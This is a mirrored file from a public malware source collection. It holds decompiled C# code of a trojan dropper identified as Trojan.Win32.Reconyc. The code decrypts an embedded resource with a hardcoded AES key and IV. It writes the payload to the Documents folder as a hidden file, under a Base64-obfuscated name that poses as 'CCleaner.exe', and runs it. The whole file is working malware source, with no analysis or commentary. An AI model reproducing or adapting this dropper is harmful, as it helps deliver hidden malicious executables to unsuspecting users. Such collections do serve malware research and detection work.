mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 18:06:10 +00:00
87 lines
2.5 KiB
C#
87 lines
2.5 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: tGtrlEBXHRXTfwxTUdB
|
|||
|
|
// Assembly: Test, Version=3.11.28.5593, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: B4C1EDE9-D91B-4814-A873-BD5883EACB0E
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Reconyc.egaj-1913b79aa5e711f9b09855b78533e4a244c7519aa2c27cf5c2237125c01ea156.exe
|
|||
|
|
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using My;
|
|||
|
|
using System;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.Reflection;
|
|||
|
|
using System.Resources;
|
|||
|
|
using System.Security.Cryptography;
|
|||
|
|
using System.Text;
|
|||
|
|
|
|||
|
|
public class tGtrlEBXHRXTfwxTUdB
|
|||
|
|
{
|
|||
|
|
[STAThread]
|
|||
|
|
public static void Main()
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
byte[] data = tGtrlEBXHRXTfwxTUdB.PTY((byte[]) new ResourceManager("PYK", Assembly.GetExecutingAssembly()).GetObject("KiR"));
|
|||
|
|
string str = MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\";
|
|||
|
|
if (File.Exists(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl"))))
|
|||
|
|
File.Delete(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")));
|
|||
|
|
MyProject.Computer.FileSystem.WriteAllBytes(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")), data, false);
|
|||
|
|
File.SetAttributes(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")), FileAttributes.Hidden);
|
|||
|
|
Process.Start(str + Encoding.UTF8.GetString(Convert.FromBase64String("Q0NsZWFuZXIuZXhl")));
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
Process.GetCurrentProcess().Kill();
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
Process.GetCurrentProcess().Kill();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static byte[] PTY(byte[] Dot)
|
|||
|
|
{
|
|||
|
|
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
|
|||
|
|
{
|
|||
|
|
rijndaelManaged.IV = new byte[16]
|
|||
|
|
{
|
|||
|
|
(byte) 1,
|
|||
|
|
(byte) 2,
|
|||
|
|
(byte) 3,
|
|||
|
|
(byte) 4,
|
|||
|
|
(byte) 5,
|
|||
|
|
(byte) 6,
|
|||
|
|
(byte) 7,
|
|||
|
|
(byte) 8,
|
|||
|
|
(byte) 9,
|
|||
|
|
(byte) 1,
|
|||
|
|
(byte) 2,
|
|||
|
|
(byte) 3,
|
|||
|
|
(byte) 4,
|
|||
|
|
(byte) 5,
|
|||
|
|
(byte) 6,
|
|||
|
|
(byte) 7
|
|||
|
|
};
|
|||
|
|
rijndaelManaged.Key = new byte[16]
|
|||
|
|
{
|
|||
|
|
(byte) 7,
|
|||
|
|
(byte) 6,
|
|||
|
|
(byte) 5,
|
|||
|
|
(byte) 4,
|
|||
|
|
(byte) 3,
|
|||
|
|
(byte) 2,
|
|||
|
|
(byte) 1,
|
|||
|
|
(byte) 9,
|
|||
|
|
(byte) 8,
|
|||
|
|
(byte) 7,
|
|||
|
|
(byte) 6,
|
|||
|
|
(byte) 5,
|
|||
|
|
(byte) 4,
|
|||
|
|
(byte) 3,
|
|||
|
|
(byte) 2,
|
|||
|
|
(byte) 1
|
|||
|
|
};
|
|||
|
|
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(Dot, 0, Dot.Length);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|